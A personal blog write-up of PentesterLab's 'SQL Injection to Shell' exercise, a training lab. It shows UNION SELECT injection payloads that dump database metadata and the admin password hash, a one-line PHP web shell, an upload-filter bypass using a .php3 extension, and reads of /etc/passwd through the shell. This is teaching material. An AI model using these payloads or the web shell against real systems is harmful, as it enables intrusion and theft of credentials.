SQL Injection to Shell

-
This exercise used a vulnerable machine provided by PenTester Labs (https://pentesterlab.com).  The goal of this exercise was to use SQL injection in a PHP based website to examine how an attacker gains access to the administration pages. The only other resource used to complete this exercise was a hash decrypter found at https://hashkiller.co.uk/md5-decrypter.aspx.

Structured Query Language (SQL), according to http://sqlcourse.com:
"SQL stands for Structured Query Language. SQL is used to communicate with a database. According to ANSI (American National Standards Institute), it is the standard language for relational database management systems. SQL statements are used to perform tasks such as update data on a database, or retrieve data from a database. Some common relational database management systems that use SQL are: Oracle, Sybase, Microsoft SQL Server, Access, Ingres, etc. Although most database systems use SQL, most of them also have their own additional proprietary extensions that are usually only used on their system. However, the standard SQL commands such as "Select", "Insert", "Update", "Delete", "Create", and "Drop" can be used to accomplish almost everything that one needs to do with a database. This tutorial will provide you with the instruction on the basics of each of these commands as well as allow you to put them to practice using the SQL Interpreter."
According to OWASP (https://www.owasp.org/index.php/SQL_Injection):
"A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands."
With this understanding, let's jump right in to this exploit. The image below depicts the homepage of the vulnerable web application.


To start, I clicked on the Landscape tab to see that the website uses PHP.


Next, I began playing with the URL parameters. Given that the landscape page had the id parameter equal to 1, I decided to see if I could set the id equal to id=3-2 with the goal of returning the same result.


I then decided to explore the next page, Sunsets. The id in the URL parameter for this page was equal to 2. 


I decided to see what results would be returned if I manipulated the URL parameter to id=1+1.


Even though this returned an error, I was able to ascertain that this website is running a MySQL database.  I decided to see what other parameters I could pass and what information I could extract. I first decided to use the UNION SELECT commands to see if I could determine the number of rows in the database. I ran this a few times before I found that there were 4 rows. Below shows the results of the failed attempt at determining the row count, followed by the successful injection.

The successful injection (as seen below) returned the page, demonstrating that the parameter injection was accepted.



Next, I decided to see if I could determine the version of the MySQL database running by injecting union select 1,@@version,3,4 in the URL parameter. The returned results showed that the web application is running MySQL version 5.7.17 (as seen below).

The next query I ran was to determine the user name. This was accomplished by injecting union select 1,user(),3,4 in the URL parameter (as seen below).


The last query I ran using the union select command was to determine the user name. This was accomplished by injecting union select 1,database(),3,4 in the URL parameter (as seen below).


To determine the column size, I used the command order by. To start, I tried using the command order by 10.


I continued to play with the parameters until I found 4 worked.


To find more information about the table itself, I used to command  union select 1,table_name,3,4 from information_schema.tables. The command union select 1,column_name,3,4 from information_schema.columns was also used to gather more information about the columns. This can be seen in the images below.


The columns returned the column names login and password.

My next objective was to find the login name from the users table. This was accomplished by using the command union select 1,login,3,4 from users


The results show that the login name found in the users table is admin. The next goal was to extract the password for admin by using the command union select 1,password,3,4 from users


The results returned the hashed value of the password for the admin login. To decrypt this password, I used the hash decrypter found at https://hashkiller.co.uk/md5-decrypter.aspx. This decrypted the MD5 hash value and showed the password for the admin login in clear text as P4ssw0rd


The next step was to login as admin using the decrypted password.



In order to get access, I wrote a simple PHP script:

<?php
  system($_GET['cmd']);
?>

The goal of this script is to get command line access to the server. I saved it as a PHP file and uploaded it to the server (as pictured below).


This upload failed. This could be that the server is blacklisting the uploading of PHP files.

To attempt and bypass this blacklist, I used the same script and saved it as a PHP3 file type and tried to upload it again.


This upload proved to be successful.


Next, I opted to view the page source information and navigate to test1.php3 file just uploaded.


I manipulated the parameter and added cmd=uname which returned the information in the image below.

To get more detailed information, I decided to include the -a flag after uname. The results can be seen below.

To confirm I had successfully penetrated the server and could send commands, I switched the parameters to cmd=cat /etc/passwd which showed I had successfully gained access to the system.

Comments

Post a Comment

Popular posts from this blog

Master Port List

-
TCP  0  Reserved TCP  1  Port Service Multiplexer TCP  2  Management Utility TCP  3  Compression Process TCP  4  Unassigned TCP  5  Remote Job Entry TCP  6  Unassigned TCP  7  Echo TCP  8  Unassigned TCP  9  Discard TCP  10  Unassigned TCP  11  Active Users TCP  12  Unassigned TCP  13  Daytime (RFC 867) TCP  14  Unassigned TCP  15  Unassigned [was netstat] TCP  16  Unassigned TCP  17  Quote of the Day TCP  18  Message Send Protocol TCP  19  Character Generator TCP  20  File Transfer [Default Data] TCP  21  File Transfer [Control] TCP  22  SSH Remote Login Protocol TCP  23  Telnet TCP  24  any private mail system TCP  25  Simple Mail Transfer TCP  26  Unassigned TCP  27  NSW User System FE TCP  28  Unas...
Read more

Reflected Cross Site Scripting (XSS) Attacks

-
Image
According to the Open Web Application Security Project's (OWASP) Top 10 list for 2017, cross site scripting (XSS) is a major security concern ( https://www.owasp.org/index.php/Top_10_2017-Top_10 ).  OWASP defines XSS as flaws that "occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites ( https://www.owasp.org/index.php/Top_10_2017-Top_10 ). Essentially, XSS allows an attacker to inject JavaScript code into a page. JavaScript is a client-side scripting language. With XSS, the JavaScript code is executed when the page loads and is executed on the client machine not the server. There are three types of XSS attacks: Stored XSS Attacks - These types of attacks are als...
Read more

Installing and Configuring WebGoat

-
Image
After doing some research, I found WebGoat. WebGoat is a deliberately insecure web application developed by the Open Web Application Security Project (OWASP) and was developed to teach users how to learn web application penetration testing. More information on OWASP can be found at https://www.owasp.org . To install WebGoat, the following is needed: Linux (for my purposes, I am using Kali Linux) https://www.kali.org/downloads/   Apache Tomcat http://tomcat.apache.org/ WebGoat https://s3.amazonaws.com/webgoat-war/webgoat-container-7.0-SNAPSHOT-war-exec.jar Java https://www.java.com/en/download/help/linux_x64_install.xml It is important to note that many Linux systems come preconfigured with Java out of the box. An easy way to find out is by running the simple command java -version The architecture of WebGoat is very simple. The diagram below shows exactly what is required (other than the Java dependency). Steps to Installing and Configuring WebGoat ...
Read more